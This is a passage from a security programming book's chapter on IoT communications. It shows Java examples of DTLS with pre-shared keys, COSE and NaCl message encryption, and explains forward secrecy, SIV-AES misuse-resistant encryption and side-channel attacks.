the client
and print
them out.
462
CHAPTER 12
Securing IoT communications
static TlsPSKIdentityManager getIdentityManager(byte[] psk) {
return new TlsPSKIdentityManager() {
@Override
public byte[] getHint() {
return null;
}
@Override
public byte[] getPSK(byte[] identity) {
return psk;
}
};
}
12.2.2 The PSK client
The PSK client is very similar to the server, as shown in listing 12.11. As before, you
create a new BcTlsCrypto object and use that to initialize a PSKTlsClient object. In
this case, you pass in the PSK and an identifier for it. If you don’t have a good identi-
fier for your PSK already, then a secure hash of the PSK works well. You can use the
Crypto.hash() method from the Salty Coffee library from chapter 6, which uses
SHA-512. As for the server, you need to override the getSupportedVersions()
method to ensure DTLS support is enabled. You can then connect to the server and
perform the DTLS handshake using the DTLSClientProtocol object. The connect()
method returns a DTLSTransport object that you can then use to send and receive
encrypted packets with the server.
Create a new file named PskClient.java alongside the server class and type in the
contents of the listing to create the server. If your editor doesn’t automatically add
them, you’ll need to add the following imports to the top of the file:
import static java.nio.charset.StandardCharsets.UTF_8;
import java.io.FileInputStream;
import java.net.*;
import java.security.*;
import org.bouncycastle.tls.*;
import org.bouncycastle.tls.crypto.impl.bc.BcTlsCrypto;
package com.manning.apisecurityinaction;
public class PskClient {
public static void main(String[] args) throws Exception {
var psk = PskServer.loadPsk(args[0].toCharArray());
var pskId = Crypto.hash(psk);
var crypto = new BcTlsCrypto(new SecureRandom());
var client = new PSKTlsClient(crypto, pskId, psk) {
@Override
Listing 12.10
The PSK identity manager
Listing 12.11
The PSK client
Leave the PSK
hint unspecified.
Return the same
PSK for all clients.
Load the PSK
and generate
an ID for it.
Create a
PSKTlsClient
with the PSK.
463
Pre-shared keys
protected ProtocolVersion[] getSupportedVersions() {
return ProtocolVersion.DTLSv12.only();
}
};
var address = InetAddress.getByName("localhost");
var socket = new DatagramSocket();
socket.connect(address, 54321);
socket.send(new DatagramPacket(new byte[0], 0));
var transport = new UDPTransport(socket, 1500);
var protocol = new DTLSClientProtocol();
var dtls = protocol.connect(client, transport);
try (var in = Files.newBufferedReader(Paths.get("test.txt"))) {
String line;
while ((line = in.readLine()) != null) {
System.out.println("Sending: " + line);
var buf = line.getBytes(UTF_8);
dtls.send(buf, 0, buf.length);
}
}
}
}
You can now test out the handshake by running the server and client in separate ter-
minal windows. Open two terminals and change to the root directory of the project in
both. Then run the following in the first one:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.PskServer \
-Dexec.args=changeit
This will compile and run the server class. If you’ve changed the keystore password,
then supply the correct value on the command line. Open the second terminal win-
dow and run the client too:
mvn exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.PskClient \
-Dexec.args=changeit
After the compilation has finished, you’ll see the client sending the lines of text to the
server and the server receiving them.
NOTE
As in previous examples, this sample code makes no attempt to handle
lost packets after the handshake has completed.
12.2.3 Supporting raw PSK cipher suites
By default, Bouncy Castle follows the recommendations from the IETF and only
enables PSK cipher suites combined with ephemeral Diffie-Hellman key agreement to
provide forward secrecy. These cipher suites are discussed in section 12.1.4. Although
Override the
supported
versions to
ensure DTLS
support.
Connect to the
server and send
a dummy packet
to start the
handshake.
Create the
DTLSClientProtocol
instance and
perform
the handshake
over UDP.
Send encrypted packets
using the returned
DTLSTransport object.
Specify the keystore
password as an argument.
464
CHAPTER 12
Securing IoT communications
these are more secure than the raw PSK cipher suites, they are not suitable for very
constrained devices that can’t perform public key cryptography. To enable the raw
PSK cipher suites, you have to override the getSupportedCipherSuites() method in
both the client and the server. Listing 12.12 shows how to override this method for the
server, in this case providing support for just a single PSK cipher suite using AES-CCM
to force its use. An identical change can be made to the PSKTlsClient object.
var server = new PSKTlsServer(crypto, getIdentityManager(psk)) {
@Override
protected ProtocolVersion[] getSupportedVersions() {
return ProtocolVersion.DTLSv12.only();
}
@Override
protected int[] getSupportedCipherSuites() {
return new int[] {
CipherSuite.TLS_PSK_WITH_AES_128_CCM
};
}
};
Bouncy Castle supports a wide range of raw PSK cipher suites in DTLS 1.2, shown in
table 12.2. Most of these also have equivalents in TLS 1.3. I haven’t listed the older
variants using CBC mode or those with unusual ciphers such as Camellia (the Japa-
nese equivalent of AES); you should generally avoid these in IoT applications.
Listing 12.12
Enabling raw PSK cipher suites
Table 12.2
Raw PSK cipher suites
Cipher suite
Description
TLS_PSK_WITH_AES_128_CCM
AES in CCM mode with a 128-bit key and 128-bit
authentication tag
TLS_PSK_WITH_AES_128_CCM_8
AES in CCM mode with 128-bit keys and 64-bit
authentication tags
TLS_PSK_WITH_AES_256_CCM
AES in CCM mode with 256-bit keys and 128-bit
authentication tags
TLS_PSK_WITH_AES_256_CCM_8
AES in CCM mode with 256-bit keys and 64-bit
authentication tags
TLS_PSK_WITH_AES_128_GCM_SHA256
AES in GCM mode with 128-bit keys
TLS_PSK_WITH_AES_256_GCM_SHA384
AES in GCM mode with 256-bit keys
TLS_PSK_WITH_CHACHA20_POLY1305_SHA256
ChaCha20-Poly1305 with 256-bit keys
Override the
getSupportedCipherSuites
method to return raw
PSK suites.
465
Pre-shared keys
12.2.4 PSK with forward secrecy
I mentioned in section 12.1.3 that the raw PSK cipher suites lack forward secrecy: if
the PSK is compromised, then all previously captured traffic can be easily decrypted.
If confidentiality of data is important to your application and your devices can support
a limited amount of public key cryptography, you can opt for PSK cipher suites com-
bined with ephemeral Diffie-Hellman key agreement to ensure forward secrecy. In
these cipher suites, authentication of the client and server is still guaranteed by the
PSK, but both parties generate random public-private key-pairs and swap the public
keys during the handshake, as shown in figure 12.6. The output of a Diffie-Hellman
key agreement between each side’s ephemeral private key and the other party’s
ephemeral public key is then mixed into the derivation of the session keys. The magic
of Diffie-Hellman ensures that the session keys can’t be recovered by an attacker that
observes the handshake messages, even if they later recover the PSK. The ephemeral
private keys are scrubbed from memory as soon as the handshake completes.
The client and server share the
same pre-shared key (PSK).
Client
Server
PSK
Ephemeral
key pair
PSK
Ephemeral
key pair
ClientHello
ServerHello
ServerKeyExchange:
- PSK ID hint
- Ephemeral PK
ClientKeyExchange:
- PSK ID
- Ephemeral PK
Each side generates a fresh
random ephemeral key pair
for each connection.
The ephemeral public keys
are exchanged during the
handshake in KeyExchange
messages along with the ID
of the PSK.
Figure 12.6
PSK cipher suites with forward secrecy use ephemeral key pairs
in addition to the PSK. The client and server swap ephemeral public keys in
key exchange messages during the TLS handshake. A Diffie-Hellman key
agreement is then performed between each side’s ephemeral private key and
the received ephemeral public key, which produces an identical secret value
that is then mixed into the TLS key derivation process.
466
CHAPTER 12
Securing IoT communications
Table 12.3 shows some recommended PSK cipher suites for TLS or DTLS 1.2 that pro-
vide forward secrecy. The ephemeral Diffie-Hellman keys can be based on either the
original finite-field Diffie-Hellman, in which case the suite names contain DHE, or on
elliptic curve Diffie-Hellman, in which case they contain ECDHE. In general, the
ECDHE variants are better-suited to constrained devices because secure parameters
for DHE require large key sizes of 2048 bits or more. The newer X25519 elliptic curve
is efficient and secure when implemented in software, but it has only recently been
standardized for use in TLS 1.3.6 The secp256r1 curve (also known as prime256v1 or
P-256) is commonly implemented by low-cost secure element microchips and is a rea-
sonable choice too.
Custom protocols and the Noise protocol framework
Although for most IoT applications TLS or DTLS should be perfectly adequate for your
needs, you may feel tempted to design your own cryptographic protocol that is a cus-
tom fit for your application. This is almost always a mistake, because even experi-
enced cryptographers have made serious mistakes when designing protocols.
Despite this widely repeated advice, many custom IoT security protocols have been
developed, and new ones continue to be made. If you feel that you must develop a
custom protocol for your application and can’t use TLS or DTLS, the Noise protocol
framework (https://noiseprotocol.org) can be used as a starting point. Noise describes
how to construct a secure protocol from a few basic building blocks and describes a
variety of handshakes that achieve different security goals. Most importantly, Noise
is designed and reviewed by experts and has been used in real-world applications,
such as the WireGuard VPN protocol (https://www.wireguard.com).
6 Support for X25519 has also been added to TLS 1.2 and earlier in a subsequent update; see https://tools
.ietf.org/html/rfc8422.
Table 12.3
PSK cipher suites with forward secrecy
Cipher suite
Description
TLS_ECDHE_PSK_WITH_AES_128_CCM_SHA256
PSK with ECDHE followed by AES-CCM
with 128-bit keys and 128-bit authentica-
tion tags. SHA-256 is used for key deriva-
tion and handshake authentication.
TLS_DHE_PSK_WITH_AES_128_CCM
PSK with DHE followed by AES-CCM with
either 128-bit or 256-bit keys. These also
use SHA-256 for key derivation and hand-
shake authentication.
TLS_DHE_PSK_WITH_AES_256_CCM
TLS_DHE_PSK_WITH_CHACHA20_POLY1305_SHA256
PSK with either DHE or ECDHE followed
by ChaCha20-Poly1305.
TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256
467
End-to-end security
All of the CCM cipher suites also come in a CCM_8 variant that uses a short 64-bit
authentication tag. As previously discussed, these variants should only be used if you
need to save every byte of network use and you are confident that you have alternative
measures in place to ensure authenticity of network traffic. AES-GCM is also sup-
ported by PSK cipher suites, but I would not recommend it in constrained environ-
ments due to the increased risk of accidental nonce reuse.
12.3
End-to-end security
TLS and DTLS provide excellent security when an API client can talk directly to the
server. However, as mentioned in the introduction to section 12.1, in a typical IoT
application messages may travel over multiple different protocols. For example, sen-
sor data produced by devices may be sent over low-power wireless networks to a local
gateway, which then puts them onto a MQTT message queue for transmission to
another service, which aggregates the data and performs a HTTP POST request to a
cloud REST API for analysis and storage. Although each hop on this journey can be
secured using TLS, messages are available unencrypted while being processed at the
intermediate nodes. This makes these intermediate nodes an attractive target for
attackers because, once compromised, they can view and manipulate all data flowing
through that device.
The solution is to provide end-to-end security of all data, independent of the trans-
port layer security. Rather than relying on the transport protocol to provide encryp-
tion and authentication, the message itself is encrypted and authenticated. For
example, an API that expects requests with a JSON payload (or an efficient binary
alternative) can be adapted to accept data that has been encrypted with an authenti-
cated encryption algorithm, which it then manually decrypts and verifies as shown in
figure 12.7. This ensures that an API request encrypted by the original client can only
be decrypted by the destination API, no matter how many different network protocols
are used to transport the request from the client to its destination.
Pop quiz
3
True or False: PSK cipher suites without forward secrecy derive the same encryp-
tion keys for every session.
4
Which one of the following cryptographic primitives is used to ensure forward
secrecy in PSK cipher suites that support this?
a
RSA encryption
b
RSA signatures
c
HKDF key derivation
d
Diffie-Hellman key agreement
e
Elliptic curve digital signatures
The answers are at the end of the chapter.
468
CHAPTER 12
Securing IoT communications
NOTE
End-to-end security is not a replacement for transport layer security.
Transport protocol messages contain headers and other details that are not
protected by end-to-end encryption or authentication. You should aim to
include security at both layers of your architecture.
End-to-end security involves more than simply encrypting and decrypting data pack-
ets. Secure transport protocols, such as TLS, also ensure that both parties are ade-
quately authenticated, and that data packets cannot be reordered or replayed. In the
next few sections you’ll see how to ensure the same protections are provided when
using end-to-end security.
12.3.1 COSE
If you wanted to ensure end-to-end security of requests to a regular JSON-based REST
API, you might be tempted to look at the JOSE (JSON Object Signing and Encryp-
tion) standards discussed in chapter 6. For IoT applications, JSON is often replaced by
more efficient binary encodings that make better use of constrained memory and net-
work bandwidth and that have compact software implementations. For example,
numeric data such as sensor readings is typically encoded as decimal strings in JSON,
with only 10 possible values for each byte, which is wasteful compared to a packed
binary encoding of the same data.
Device
Gateway
Gateway
Cloud
API
BLE
MQTT
HTTP
…
…
Device requests are individually encrypted and
authenticated, creating a message envelope.
The encrypted request
passes through gateways
without being decrypted.
Gateways can still translate
the unencrypted transport
protocol headers.
The target API decrypts and
validates the received message to
retrieve the original API request.
Figure 12.7
In end-to-end security, API requests are individually encrypted and
authenticated by the client device. These encrypted requests can then traverse
multiple transport protocols without being decrypted. The API can then decrypt the
request and verify it hasn’t been tampered with before processing the API request.
469
End-to-end security
Several binary alternatives to JSON have become popular in recent years to over-
come these problems. One popular choice is Concise Binary Object Representation
(CBOR), which provides a compact binary format that roughly follows the same model
as JSON, providing support for objects consisting of key-value fields, arrays, text and
binary strings, and integer and floating-point numbers. Like JSON, CBOR can be
parsed and processed without a schema. On top of CBOR, the CBOR Object Signing
and Encryption (COSE; https://tools.ietf.org/html/rfc8152) standards provide simi-
lar cryptographic capabilities as JOSE does for JSON.
DEFINITION
CBOR (Concise Binary Object Representation) is a binary alterna-
tive to JSON. COSE (CBOR Object Signing and Encryption) provides encryp-
tion and digital signature capabilities for CBOR and is loosely based on JOSE.
Although COSE is loosely based on JOSE, it has diverged quite a lot, both in the algo-
rithms supported and in how messages are formatted. For example, in JOSE symmet-
ric MAC, algorithms like HMAC are part of JWS (JSON Web Signatures) and treated
as equivalent to public key signature algorithms. In COSE, MACs are treated more
like authenticated encryption algorithms, allowing the same key agreement and key
wrapping algorithms to be used to transmit a per-message MAC key.
In terms of algorithms, COSE supports many of the same algorithms as JOSE, and
adds additional algorithms that are more suited to constrained devices, such as AES-
CCM and ChaCha20-Poly1305 for authenticated encryption, and truncated version of
HMAC-SHA-256 that produces a smaller 64-bit authentication tag. It also removes
some algorithms with perceived weaknesses, such as RSA with PKCS#1 v1.5 padding
and AES in CBC mode with a separate HMAC tag. Unfortunately, dropping support for
CBC mode means that all of the COSE authenticated encryption algorithms require
nonces that are too small to generate randomly. This is a problem, because when
implementing end-to-end encryption, there are no session keys or record sequence
numbers that can be used to safely implement a deterministic nonce.
Thankfully, COSE has a solution in the form of HKDF (hash-based key derivation
function) that you used in chapter 11. Rather than using a key to directly encrypt a
message, you can instead use the key along with a random nonce to derive a unique
key for every message. Because nonce reuse problems only occur if you reuse a
nonce with the same key, this reduces the risk of accidental nonce reuse consider-
ably, assuming that your devices have access to an adequate source of random data
(see section 12.3.2 if they don’t).
To demonstrate the use of COSE for encrypting messages, you can use the Java ref-
erence implementation from the COSE working group. Open the pom.xml file in
your editor and add the following lines to the dependencies section:7
7 The author of the reference implementation, Jim Schaad, also runs a winery named August Cellars in Oregon
if you are wondering about the domain name.
470
CHAPTER 12
Securing IoT communications
<dependency>
<groupId>com.augustcellars.cose</groupId>
<artifactId>cose-java</artifactId>
<version>1.1.0</version>
</dependency>
Listing 12.13 shows an example of encrypting a message with COSE using HKDF to
derive a unique key for the message and AES-CCM with a 128-bit key for the message
encryption, which requires installing Bouncy Castle as a cryptography provider. For
this example, you can reuse the PSK from the examples in section 12.2.1. COSE
requires a Recipient object to be created for each recipient of a message and the
HKDF algorithm is specified at this level. This allows different key derivation or wrap-
ping algorithms to be used for different recipients of the same message, but in this
example, there’s only a single recipient. The algorithm is specified by adding an attri-
bute to the recipient object. You should add these attributes to the PROTECTED header
region, to ensure they are authenticated. The random nonce is also added to the
recipient object, as the HKDF_Context_PartyU_nonce attribute; I’ll explain the PartyU
part shortly. You then create an EncryptMessage object and set some content for the
message. Here I’ve used a simple string, but you can also pass any array of bytes.
Finally, you specify the content encryption algorithm as an attribute of the message (a
variant of AES-CCM in this case) and then encrypt it.
Security.addProvider(new BouncyCastleProvider());
var keyMaterial = PskServer.loadPsk("changeit".toCharArray());
var recipient = new Recipient();
var keyData = CBORObject.NewMap()
.Add(KeyKeys.KeyType.AsCBOR(), KeyKeys.KeyType_Octet)
.Add(KeyKeys.Octet_K.AsCBOR(), keyMaterial);
recipient.SetKey(new OneKey(keyData));
recipient.addAttribute(HeaderKeys.Algorithm,
AlgorithmID.HKDF_HMAC_SHA_256.AsCBOR(),
Attribute.PROTECTED);
var nonce = new byte[16];
new SecureRandom().nextBytes(nonce);
recipient.addAttribute(HeaderKeys.HKDF_Context_PartyU_nonce,
CBORObject.FromObject(nonce), Attribute.PROTECTED);
var message = new EncryptMessage();
message.SetContent("Hello, World!");
message.addAttribute(HeaderKeys.Algorithm,
AlgorithmID.AES_CCM_16_128_128.AsCBOR(),
Attribute.PROTECTED);
message.addRecipient(recipient);
message.encrypt();
System.out.println(Base64url.encode(message.EncodeToBytes()));
Listing 12.13
Encrypting a message with COSE HKDF
Install Bouncy Castle to
get AES-CCM support.
Load the key
from the
keystore.
Encode the key
as a COSE key
object and add
to the recipient.
The KDF algorithm is
specified as an attribute
of the recipient.
The nonce is
also set as an
attribute on
the recipient.
Create the message
and specify the
content encryption
algorithm.
Encrypt the
message
and output
the encoded
result.
471
End-to-end security
The HKDF algorithm in COSE supports specifying several fields in addition to the
PartyU nonce, as shown in table 12.4, which allows the derived key to be bound to sev-
eral attributes, ensuring that distinct keys are derived for different uses. Each attribute
can be set for either Party U or Party V, which are just arbitrary names for the partici-
pants in a communication protocol. In COSE, the convention is that the sender of a
message is Party U and the recipient is Party V. By simply swapping the Party U and
Party V roles around, you can ensure that distinct keys are derived for each direction
of communication, which provides a useful protection against reflection attacks. Each
party can contribute a nonce to the KDF, as well as identity information and any other
contextual information. For example, if your API can receive many different types of
requests, you could include the request type in the context to ensure that different
keys are used for different types of requests.
DEFINITION
A reflection attack occurs when an attacker intercepts a message
from Alice to Bob and replays that message back to Alice. If symmetric mes-
sage authentication is used, Alice may be unable to distinguish this from a
genuine message from Bob. Using distinct keys for messages from Alice to
Bob than messages from Bob to Alice prevents these attacks.
HKDF context fields can either be explicitly communicated as part of the message, or
they can be agreed on by parties ahead of time and be included in the KDF computa-
tion without being included in the message. If a random nonce is used, then this obvi-
ously needs to be included in the message; otherwise, the other party won’t be able to
guess it. Because the fields are included in the key derivation process, there is no need
to separately authenticate them as part of the message: any attempt to tamper with
them will cause an incorrect key to be derived. For this reason, you can put them in an
UNPROTECTED header which is not protected by a MAC.
Although HKDF is designed for use with hash-based MACs, COSE also defines a
variant of it that can use a MAC based on AES in CBC mode, known as HKDF-AES-
MAC (this possibility was explicitly discussed in Appendix D of the original HKDF pro-
posal, see https://eprint.iacr.org/2010/264.pdf). This eliminates the need for a hash
Table 12.4
COSE HKDF context fields
Field
Purpose
PartyU identity
An identifier for party U and V. This might be a username or domain name or some
other application-specific identifier.
PartyV identity
PartyU nonce
Nonces contributed by either or both parties. These can be arbitrary random byte
arrays or integers. Although these could be simple counters it’s best to generate them
randomly in most cases.
PartyV nonce
PartyU other
Any application-specific additional context information that should be included in the
key derivation.
PartyV other
472
CHAPTER 12
Securing IoT communications
function implementation, saving some code size on constrained devices. This can be
particularly important on low-power devices because some secure element chips pro-
vide hardware support for AES (and even public key cryptography) but have no sup-
port for SHA-256 or other hash functions, requiring devices to fall back on slower and
less efficient software implementations.
NOTE
You’ll recall from chapter 11 that HKDF consists of two functions: an
extract function that derives a master key from some input key material, and
an expand function that derives one or more new keys from the master key.
When used with a hash function, COSE’s HKDF performs both functions.
When used with AES it only performs the expand phase; this is fine because
the input key is already uniformly random as explained in chapter 11.8
In addition to symmetric authenticated encryption, COSE supports a range of public
key encryption and signature options, which are mostly very similar to JOSE, so I
won’t cover them in detail here. One public key algorithm in COSE that is worth high-
lighting in the context of IoT applications is support for elliptic curve Diffie-Hellman
(ECDH) with static keys for both the sender and receiver, known as ECDH-SS. Unlike
the ECDH-ES encryption scheme supported by JOSE, ECDH-SS provides sender
authentication, avoiding the need for a separate signature over the contents of each
message. The downside is that ECDH-SS always derives the same key for the same pair of
sender and receiver, and so can be vulnerable to replay attacks and reflection attacks,
and lacks any kind of forward secrecy. Nevertheless, when used with HKDF and mak-
ing use of the context fields in table 12.4 to bind derived keys to the context in which
they are used, ECDH-SS can be a very useful building block in IoT applications.
12.3.2 Alternatives to COSE
Although COSE is in many ways better designed than JOSE and is starting to see wide
adoption in standards such as FIDO 2 for hardware security keys (https://fidoalliance
.org/fido2/), it still suffers from the same problem of trying to do too much. It sup-
ports a wide variety of cryptographic algorithms, with varying security goals and quali-
ties. At the time of writing, I counted 61 algorithm variants registered in the COSE
algorithms registry (http://mng.bz/awDz), the vast majority of which are marked as
recommended. This desire to cover all bases can make it hard for developers to know
which algorithms to choose and while many of them are fine algorithms, they can lead
to security issues when misused, such as the accidental nonce reuse issues you’ve
learned about in the last few sections.
8 It’s unfortunate that COSE tries to handle both cases in a single class of algorithms. Requiring the expand
function for HKDF with a hash function is inefficient when the input is already uniformly random. On the
other hand, skipping it for AES is potentially insecure if the input is not uniformly random.
473
End-to-end security
If you need standards-based interoperability with other software, the COSE can be a
fine choice for an IoT ecosystem, so long as you approach it with care. In many cases,
however, interoperability is not a requirement because you control all of the software
and devices being deployed. In this a simpler approach can be adopted, such as using
NaCl (the Networking and Cryptography Library; https://nacl.cr.yp.to) to encrypt
and authenticate a packet of data just as you did in chapter 6. You can still use CBOR
or another compact binary encoding for the data itself, but NaCl (or a rewrite of it,
like libsodium) takes care of choosing appropriate cryptographic algorithms, vetted
by genuine experts. Listing 12.14 shows how easy it is to encrypt a CBOR object using
NaCl’s SecretBox functionality (in this case through the pure Java Salty Coffee library
you used in chapter 6), which is roughly equivalent to the COSE example from the
previous section. First you load or generate the secret key, and then you encrypt your
CBOR data using that key.
var key = SecretBox.key();
var cborMap = CBORObject.NewMap()
.Add("foo", "bar")
.Add("data", 12345);
var box = SecretBox.encrypt(key, cborMap.EncodeToBytes());
System.out.println(box);
NaCl’s secret box is relatively well suited to IoT applications for several reasons:
It uses a 192-bit per-message nonce, which minimizes the risk of accidental
nonce reuse when using randomly generated values. This is the maximum size
SHA-3 and STROBE
The US National Institute of Standards and Technology (NIST) recently completed an
international competition to select the algorithm to become SHA-3, the successor to
the widely used SHA-2 hash function family. To protect against possible future weak-
nesses in SHA-2, the winning algorithm (originally known as Keccak) was chosen
partly because it is very different in structure to SHA-2. SHA-3 is based on an elegant
and flexible cryptographic primitive known as a sponge construction. Although SHA-3
is relatively slow in software, it is well-suited to efficient hardware implementations.
The Keccak team have subsequently implemented a wide variety of cryptographic
primitives based on the same core sponge construction: other hash functions, MACs,
and authenticated encryption algorithms. See https://keccak.team for more details.
Mike Hamburg’s STROBE framework (https://strobe.sourceforge.io) builds on top of
the SHA-3 work to create a framework for cryptographic protocols for IoT applications.
The design allows a single small core of code to provide a wide variety of crypto-
graphic protections, making a compelling alternative to AES for constrained devices.
If hardware support for the Keccak core functions becomes widely available, then
frameworks like STROBE may become very attractive.
Listing 12.14
Encrypting CBOR with NaCl
Create or load a key.
Generate some
CBOR data.
Encrypt
the data.
474
CHAPTER 12
Securing IoT communications
of nonce, so you can use a shorter value if you absolutely need to save space
and pad it with zeroes before decrypting. Reducing the size increases the risk
of accidental nonce reuse, so you should avoid reducing it to much less than
128 bits.
The XSalsa20 cipher and Poly1305 MAC used by NaCl can be compactly imple-
mented in software on a wide range of devices. They are particularly suited to
32-bit architectures, but there are also fast implementations for 8-bit microcon-
trollers. They therefore make a good choice on platforms without hardware
AES support.
The 128-bit authentication tag use by Poly1305 is a good trade-off between secu-
rity and message expansion. Although stronger MAC algorithms exist, the
authentication tag only needs to remain secure for the lifetime of the message
(until it expires, for example), whereas the contents of the message may need
to remain secret for a lot longer.
If your devices are capable of performing public key cryptography, then NaCl also
provides convenient and efficient public key authenticated encryption in the form the
CryptoBox class, shown in listing 12.15. The CryptoBox algorithm works a lot like
COSE’s ECDH-SS algorithm in that it performs a static key agreement between the
two parties. Each party has their own key pair along with the public key of the other
party (see section 12.4 for a discussion of key distribution). To encrypt, you use your
own private key and the recipient’s public key, and to decrypt, the recipient uses their
private key and your public key. This shows that even public key cryptography is not
much more work when you use a well-designed library like NaCl.
WARNING
Unlike COSE’s HKDF, the key derivation performed in NaCl’s
crypto box doesn’t bind the derived key to any context material. You should
make sure that messages themselves contain the identities of the sender and
recipient and sufficient context to avoid reflection or replay attacks.
var senderKeys = CryptoBox.keyPair();
var recipientKeys = CryptoBox.keyPair();
var cborMap = CBORObject.NewMap()
.Add("foo", "bar")
.Add("data", 12345);
var sent = CryptoBox.encrypt(senderKeys.getPrivate(),
recipientKeys.getPublic(), cborMap.EncodeToBytes());
var recvd = CryptoBox.fromString(sent.toString());
var cbor = recvd.decrypt(recipientKeys.getPrivate(),
senderKeys.getPublic());
System.out.println(CBORObject.DecodeFromBytes(cbor));
Listing 12.15
Using NaCl’s CryptoBox
The sender and recipient
each have a key pair.
Encrypt using your
private key and
the recipient’s
public key.
The recipient
decrypts with their
private key and
your public key.
475
End-to-end security
12.3.3 Misuse-resistant authenticated encryption
Although NaCl and COSE can both be used in ways that minimize the risk of nonce
reuse, they only do so on the assumption that a device has access to some reliable
source of random data. This is not always the case for constrained devices, which
often lack access to good sources of entropy or even reliable clocks that could be
used for deterministic nonces. Pressure to reduce the size of messages may also
result in developers using nonces that are too small to be randomly generated safely.
An attacker may also be able to influence conditions to make nonce reuse more
likely, such as by tampering with the clock, or exploiting weaknesses in network pro-
tocols, as occurred in the KRACK attacks against WPA2 (https://www.krackattacks
.com). In the worst case, where a nonce is reused for many messages, the algorithms
in NaCl and COSE both fail catastrophically, enabling an attacker to recover a lot of
information about the encrypted data and in some cases to tamper with that data or
construct forgeries.
To avoid this problem, cryptographers have developed new modes of operation
for ciphers that are much more resistant to accidental or malicious nonce reuse.
These modes of operation achieve a security goal called misuse-resistant authenticated
encryption (MRAE). The most well-known such algorithm is SIV-AES, based on a
mode of operation known as Synthetic Initialization Vector (SIV; https://tools.ietf.org/
html/rfc5297). In normal use with unique nonces, SIV mode provides the same
guarantees as any other authenticated encryption cipher. But if a nonce is reused, a
MRAE mode doesn’t fail as catastrophically: an attacker could only tell if the exact
same message had been encrypted with the same key and nonce. No loss of authen-
ticity or integrity occurs at all. This makes SIV-AES and other MRAE modes much
safer to use in environments where it might be hard to guarantee unique nonces,
such as IoT devices.
DEFINITION
A cipher provides misuse-resistant authenticated encryption (MRAE)
if accidental or deliberate nonce reuse results in only a small loss of security.
An attacker can only learn if the same message has been encrypted twice with
the same nonce and key and there is no loss of authenticity. Synthetic Initializa-
tion Vector (SIV) mode is a well-known MRAE mode, and SIV-AES the most com-
mon use of it.
SIV mode works by computing the nonce (also known as an Initialization Vector or
IV) using a pseudorandom function (PRF) rather than using a purely random value
or counter. Many MACs used for authentication are also PRFs, so SIV reuses the MAC
used for authentication to also provide the IV, as shown in figure 12.8.
CAUTION
Not all MACs are PRFs so you should stick to standard implementa-
tions of SIV mode rather than inventing your own.
476
CHAPTER 12
Securing IoT communications
The encryption process works by making two passes over the input:
1
First, a MAC is computed over the plaintext input and any associated data.9 The
MAC tag is known as the Synthetic IV, or SIV.
2
Then the plaintext is encrypted using a different key using the MAC tag from
step 1 as the nonce.
The security properties of the MAC ensure that it is extremely unlikely that two differ-
ent messages will result in the same MAC tag, and so this ensures that the same nonce
is not reused with two different messages. The SIV is sent along with the message, just
as a normal MAC tag would be. Decryption works in reverse: first the ciphertext is
decrypted using the SIV, and then the correct MAC tag is computed and compared
with the SIV. If the tags don’t match, then the message is rejected.
WARNING
Because the authentication tag can only be validated after the mes-
sage has been decrypted, you should be careful not to process any decrypted
data before this crucial authentication step has completed.
In SIV-AES, the MAC is AES-CMAC, which is an improved version of the AES-CBC-
MAC used in COSE. Encryption is performed using AES in CTR mode. This means
9 The sharp-eyed among you may notice that this is a variation of the MAC-then-Encrypt scheme that we said
in chapter 6 is not guaranteed to be secure. Although this is generally true, SIV mode has a proof of security
so it is an exception to the rule.
{“sensor”: “abc123”,”data”:…}
AES-CMAC
MAC key
AES-CTR
Ciphertext
Encryption
key
IV
Authentication tag
In SIV mode, the MAC tag is
used as the IV for encryption.
AES-SIV only needs an AES encryption
circuit for all operations.
Figure 12.8
SIV mode uses the MAC authentication tag as the IV for encryption. This
ensures that the IV will only repeat if the message is identical, eliminating nonce reuse
issues that can cause catastrophic security failures. SIV-AES is particularly suited to IoT
environments because it only needs an AES encryption circuit to perform all operations
(even decryption).
477
End-to-end security
that SIV-AES has the same nice property as AES-CCM: it requires only an AES encryp-
tion circuit for all operations (even decryption), so can be compactly implemented.
So far, the mode I’ve described will always produce the same nonce and the same
ciphertext whenever the same plaintext message is encrypted. If you recall from chap-
ter 6, such an encryption scheme is not secure because an attacker can easily tell if the
same message has been sent multiple times. For example, if you have a sensor sending
packets of data containing sensor readings in a small range of values, then an observer
Side-channel and fault attacks
Although SIV mode protects against accidental or deliberate misuse of nonces, it
doesn’t protect against all possible attacks in an IoT environment. When an attacker
may have direct physical access to devices, especially where there is limited physical
protection or surveillance, you may also need to consider other attacks. A secure ele-
ment chip can provide some protection against tampering and attempts to read keys
directly from memory, but keys and other secrets may also leak though many side
channels. A side channel occurs when information about a secret can be deduced by
measuring physical aspects of computations using that secret, such as the following:
The timing of operations may reveal information about the key. Modern crypto-
graphic implementations are designed to be constant time to avoid leaking
information about the key in this way. Many software implementations of AES
are not constant time, so alternative ciphers such as ChaCha20 are often
preferred for this reason.
The amount of power used by a device may vary depending on the value of
secret data it is processing. Differential power analysis can be used to
recover secret data by examining how much power is used when processing
different inputs.
Emissions produced during processing, including electromagnetic radiation,
heat, or even sounds have all been used to recover secret data from cryp-
tographic computations.
As well as passively observing physical aspects of a device, an attacker may also
directly interfere with a device in an attempt to recover secrets. In a fault attack, an
attacker disrupts the normal functioning of a device in the hope that the faulty oper-
ation will reveal some information about secrets it is processing. For example, tweak-
ing the power supply (known as a glitch) at a well-chosen moment might cause an
algorithm to reuse a nonce, leaking information about messages or a private key. In
some cases, deterministic algorithms such as SIV-AES can actually make fault attacks
easier for an attacker.
Protecting against side-channel and fault attacks is well beyond the scope of this
book. Cryptographic libraries and devices will document if they have been designed
to resist these attacks. Products may be certified against standards such as FIPS
140-2 or Commons Criteria, which both provide some assurance that the device will
resist some physical attacks, but you need to read the fine print to determine exactly
which threats have been tested.
478
CHAPTER 12
Securing IoT communications
may be able to work out what the encrypted sensor readings are after seeing enough
of them. This is why normal encryption modes add a unique nonce or random IV in
every message: to ensure that different ciphertext is produced even if the same mes-
sage is encrypted. SIV mode solves this problem by allowing you to include a random
IV in the associated data that accompanies the message. Because this associated data
is also included in the MAC calculation, it ensures that the calculated SIV will be dif-
ferent even if the message is the same. To make this a bit easier, SIV mode allows
more than one associated data block to be provided to the cipher—up to 126 blocks
in SIV-AES.
Listing 12.16 shows an example of encrypting some data with SIV-AES in Java using
an open source library that implements the mode using AES primitives from Bouncy
Castle.10 To include the library, open the pom.xml file and add the following lines to
the dependencies section:
<dependency>
